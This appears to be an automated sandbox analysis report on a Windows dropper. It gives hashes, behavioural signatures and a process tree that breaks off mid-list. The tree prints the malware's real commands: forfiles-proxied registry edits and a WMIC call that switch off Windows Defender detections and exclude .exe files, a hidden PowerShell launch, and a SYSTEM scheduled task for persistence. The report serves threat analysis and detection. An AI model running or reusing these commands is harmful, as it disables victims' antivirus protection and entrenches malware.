Analysis

  • max time kernel
    135s
  • max time network
    137s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    12/08/2024, 12:45

General

  • Target

    xkQ8VTlNBlqb5xSDoMQYQi1Z.exe

  • Size

    7.3MB

  • MD5

    d31cbdeb16f8edd8d5408c68a61fcf6e

  • SHA1

    4cc3b9d109348fcbf8f0946c3862797585ef5f7d

  • SHA256

    5d876bde0e46b128971141a7b65ecb34dcfa008626c1561940b0d321082efe19

  • SHA512

    afc858761d5f54ac6f4786f81b8fe105e5118bd68335eea592616257d21fa57e4696546f5d5aad1a7698d5d4386c8c2d6754afad072f806ac93fecb18f7f3403

  • SSDEEP

    98304:91OU66wBTpVlNQHYi3kf+55CRTCu/mmzxpy37b9o/kOXrYv+TP2eabF5pHNLYyn7:91OU66IlNQHTq+5redXrYyu//syBj1

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 35 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\xkQ8VTlNBlqb5xSDoMQYQi1Z.exe
    "C:\Users\Admin\AppData\Local\Temp\xkQ8VTlNBlqb5xSDoMQYQi1Z.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Users\Admin\AppData\Local\Temp\7zS632E.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Users\Admin\AppData\Local\Temp\7zS6513.tmp\Install.exe
        .\Install.exe /ZvxkOdidb "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4920
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1248
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1804
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3744
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:208
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2244
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:32
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:312
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:216
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4040
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:3404
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:988
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:344
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                7⤵
                  PID:592
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2552
              • C:\Windows\SysWOW64\cmd.exe
                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1056
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1160
                  • C:\Windows\SysWOW64\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:4448
          • C:\Windows\SysWOW64\forfiles.exe
            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
            4⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1448
            • C:\Windows\SysWOW64\cmd.exe
              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:512
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2112
                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4988
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /CREATE /TN "bQIvCbfVWxBMfdFfEo" /SC once /ST 12:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6513.tmp\Install.exe\" Wd /TWCdiduI 525403 /S" /V1 /F
            4⤵
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4480
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 644
            4⤵
            • Program crash
            PID:404
    • C:\Users\Admin\AppData\Local\Temp\7zS6513.tmp\Install.exe
      C:\Users\Admin\AppData\Local\Temp\7zS6513.tmp\Install.exe Wd /TWCdiduI 525403 /S
      1⤵
      • Executes dropped EXE
      • Drops desktop.ini file(s)
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      PID:2272
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        2⤵
          PID:2884
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            3⤵
            • Indirect Command Execution
            PID:2800
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              4⤵
                PID:2964
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  5⤵
                    PID:5072
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                3⤵
                • Indirect Command Execution
                PID:484
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  4⤵
                    PID:2280
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3536
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                  3⤵
                  • Indirect Command Execution
                  PID:4140
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    4⤵
                      PID:5000
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        5⤵
                          PID:5080
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      3⤵
                      • Indirect Command Execution
                      PID:4800
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3836
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          5⤵
                            PID:2580
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        3⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:4632
                        • C:\Windows\SysWOW64\cmd.exe
                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:4928
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2448
                            • C:\Windows\SysWOW64\gpupdate.exe
                              "C:\Windows\system32\gpupdate.exe" /force
                              6⤵
                                PID:208
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                        2⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4152
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:4584
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5008
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                            3⤵
                              PID:1268
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:4356
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2100
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                              3⤵
                                PID:4740
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:5040
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3456
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3272
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2196
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1424
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2968
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:4604
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:1532
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:2856
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4132
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3888
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2480
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3672
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4904
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:796
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:3164
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4988
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:4380
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1800
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:824
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:2540
                                              • C:\Windows\SysWOW64\reg.exe
